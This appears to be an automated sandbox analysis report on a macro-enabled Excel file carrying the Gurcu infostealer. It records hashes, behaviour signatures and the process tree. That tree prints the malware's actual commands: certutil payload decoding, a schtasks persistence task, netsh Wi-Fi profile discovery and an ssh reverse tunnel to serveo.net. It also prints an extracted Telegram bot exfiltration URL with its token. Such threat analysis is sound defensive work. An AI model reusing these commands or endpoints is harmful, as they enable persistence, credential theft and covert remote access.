Analysis
-
max time kernel
137s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27-10-2024 10:57
Static task
static1
Behavioral task
behavioral1
Sample
e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm
Resource
win10v2004-20241007-en
General
-
Target
e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm
-
Size
201KB
-
MD5
c595d96742a883a534ed1ca1f0d279d1
-
SHA1
c465daa9e5bd998ef39c59f80f82f79cc75ce659
-
SHA256
e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de
-
SHA512
142506545388000aad69fbd9dabd62cb80b75fceb83cb8e31747a1c2de5495327fff2d4a6badabc691fb68df2361aa9f0a5adf969cf3f688b1f89959ca04538b
-
SSDEEP
6144:+pQEXBxlv/9mIRzcZcD50SQBpDb8FJA7xqSWbLsE4D:+XBrv/AIRA6D5nQB5b8FJA7xGfsVD
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7761583635:AAGKfAalgYsBotuxvw8mb6qVnPPY4_337uo/sendMessage?chat_id=972119615
Signatures
-
Gurcu family
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1140 3692 certutil.exe 83 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Of74e1e35dd903c3c23095278b7f18453a5.exe -
Executes dropped EXE 4 IoCs
pid Process 2284 Of74e1e35dd903c3c23095278b7f18453a5.exe 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 3712 Of74e1e35dd903c3c23095278b7f18453a5.exe 1828 Of74e1e35dd903c3c23095278b7f18453a5.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Of74e1e35dd903c3c23095278b7f18453a5.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Of74e1e35dd903c3c23095278b7f18453a5.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Of74e1e35dd903c3c23095278b7f18453a5.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Of74e1e35dd903c3c23095278b7f18453a5.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Of74e1e35dd903c3c23095278b7f18453a5.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Of74e1e35dd903c3c23095278b7f18453a5.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Of74e1e35dd903c3c23095278b7f18453a5.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Of74e1e35dd903c3c23095278b7f18453a5.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Of74e1e35dd903c3c23095278b7f18453a5.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 1140 certutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 31 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3024 cmd.exe 3708 netsh.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 5004 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1000 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3692 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 3712 Of74e1e35dd903c3c23095278b7f18453a5.exe 3712 Of74e1e35dd903c3c23095278b7f18453a5.exe 1828 Of74e1e35dd903c3c23095278b7f18453a5.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2284 Of74e1e35dd903c3c23095278b7f18453a5.exe Token: SeDebugPrivilege 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe Token: SeDebugPrivilege 3712 Of74e1e35dd903c3c23095278b7f18453a5.exe Token: SeDebugPrivilege 1828 Of74e1e35dd903c3c23095278b7f18453a5.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 3692 EXCEL.EXE 3692 EXCEL.EXE 3692 EXCEL.EXE 3692 EXCEL.EXE 3692 EXCEL.EXE 3692 EXCEL.EXE 3692 EXCEL.EXE 3692 EXCEL.EXE 3692 EXCEL.EXE 3692 EXCEL.EXE 3692 EXCEL.EXE 3692 EXCEL.EXE 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 3712 Of74e1e35dd903c3c23095278b7f18453a5.exe 1828 Of74e1e35dd903c3c23095278b7f18453a5.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 3692 wrote to memory of 1140 3692 EXCEL.EXE 87 PID 3692 wrote to memory of 1140 3692 EXCEL.EXE 87 PID 3692 wrote to memory of 2284 3692 EXCEL.EXE 90 PID 3692 wrote to memory of 2284 3692 EXCEL.EXE 90 PID 2284 wrote to memory of 2036 2284 Of74e1e35dd903c3c23095278b7f18453a5.exe 92 PID 2284 wrote to memory of 2036 2284 Of74e1e35dd903c3c23095278b7f18453a5.exe 92 PID 2036 wrote to memory of 2568 2036 cmd.exe 94 PID 2036 wrote to memory of 2568 2036 cmd.exe 94 PID 2036 wrote to memory of 5004 2036 cmd.exe 95 PID 2036 wrote to memory of 5004 2036 cmd.exe 95 PID 2036 wrote to memory of 1000 2036 cmd.exe 101 PID 2036 wrote to memory of 1000 2036 cmd.exe 101 PID 2036 wrote to memory of 3812 2036 cmd.exe 102 PID 2036 wrote to memory of 3812 2036 cmd.exe 102 PID 3812 wrote to memory of 3024 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 103 PID 3812 wrote to memory of 3024 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 103 PID 3024 wrote to memory of 4484 3024 cmd.exe 105 PID 3024 wrote to memory of 4484 3024 cmd.exe 105 PID 3024 wrote to memory of 3708 3024 cmd.exe 106 PID 3024 wrote to memory of 3708 3024 cmd.exe 106 PID 3024 wrote to memory of 2440 3024 cmd.exe 107 PID 3024 wrote to memory of 2440 3024 cmd.exe 107 PID 3812 wrote to memory of 4704 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 108 PID 3812 wrote to memory of 4704 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 108 PID 4704 wrote to memory of 3192 4704 cmd.exe 110 PID 4704 wrote to memory of 3192 4704 cmd.exe 110 PID 4704 wrote to memory of 2064 4704 cmd.exe 111 PID 4704 wrote to memory of 2064 4704 cmd.exe 111 PID 4704 wrote to memory of 1432 4704 cmd.exe 112 PID 4704 wrote to memory of 1432 4704 cmd.exe 112 PID 3812 wrote to memory of 3600 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 115 PID 3812 wrote to memory of 3600 3812 Of74e1e35dd903c3c23095278b7f18453a5.exe 115 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Of74e1e35dd903c3c23095278b7f18453a5.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Of74e1e35dd903c3c23095278b7f18453a5.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\e5cae5d1795bfc9b308b92f20b2421aecc81b97d36624863871bae5739aab3de.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\System32\certutil.exe"C:\Windows\System32\certutil.exe" -decode C:\Users\Admin\AppData\Local\Temp\Z74435e84d5ae7c60f81018b4950fef2fc7 C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe2⤵
- Process spawned unexpected child process
- Deobfuscate/Decode Files or Information
PID:1140
-
-
C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe"C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "Of74e1e35dd903c3c23095278b7f18453a5" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Of74e1e35dd903c3c23095278b7f18453a5.exe" &&START "" "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\chcp.comchcp 650014⤵PID:2568
-
-
C:\Windows\system32\timeout.exetimeout /t 34⤵
- Delays execution with timeout.exe
PID:5004
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Of74e1e35dd903c3c23095278b7f18453a5" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1000
-
-
C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe"C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:3812 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:4484
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3708
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"6⤵PID:2440
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"5⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:3192
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid6⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2064
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"6⤵PID:1432
-
-
-
C:\Windows\System32\OpenSSH\ssh.exe"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3068 serveo.net5⤵PID:3600
-
-
-
-
-
C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exeC:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3712
-
C:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exeC:\Users\Admin\AppData\Local\Starlabs\Of74e1e35dd903c3c23095278b7f18453a5.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1828
Network
MITRE ATT&CK Enterprise v15
Persistence
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
1Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Of74e1e35dd903c3c23095278b7f18453a5.exe.log
Filesize847B
MD53308a84a40841fab7dfec198b3c31af7
SHA14e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA51297521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198
-
Filesize
135KB
MD5410bd9796a48df659618b405cdcedced
SHA1b87887753569673a6a3ea8ad568e0174c214f1ff
SHA2569c5701ef66f03629131a476381865069d0cf78bed20fab2725d04c2f9471af5f
SHA5121441142e9ade59fcea06afa43033ead028c68f0b5d420ded9fbd4b2c6fdcdd16bb002a58a87a4d637c7df70e1a5d680367be2bd8cc24e6e7346247d3587c9f5e
-
Filesize
180KB
MD5b2d32fe2797534b941688bc919d564fd
SHA17949b2d8e9e1d5c1e84618e10d61b615e0376676
SHA2565331e34ca1acf5576ce551607ecf5bf4430078e08a02bd940bab501bcb62135c
SHA51213b598897c35adfa09cf4664a20cf38bbde4968c2961691bff9e772c8ec6c5e97b241525fb39bffbeb02fa9bcde132897e3be3372c428d80529c89827bb70596
-
Filesize
4B
MD5f5496252609c43eb8a3d147ab9b9c006
SHA103f8cd2c9e12b97fed00427c6d66da173468a1f9
SHA256e12868d1f3963e0e1129b3a6442b6d3d7d8e4eb7e27d34348b29523f0ae37748
SHA5129caa41d81e9539b9584e310a8cbc6acfc0ada1ed953856ae1d3e75fc1891bf048ab1accf85788208080605f387e225d4c11452e93aa4a5c9fe96a24631e56a2f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD5d95b6d405d530b8a81383dfd382cc1af
SHA179072d3de481abd26391c933f6b226b9fb4aa599
SHA256795b2bac028fd471a5c2b0e4240e3cd1b3d220529b8c878c70053ff28b04d5e1
SHA512c08c23d2de951a52f270e3b79fc51192b0e7f7631ff2089e68d2354e81ecb4d18114e445bd26acf08520ab0e7934ee34dbfedfe1d4b1bdf7eccad2619a305a8c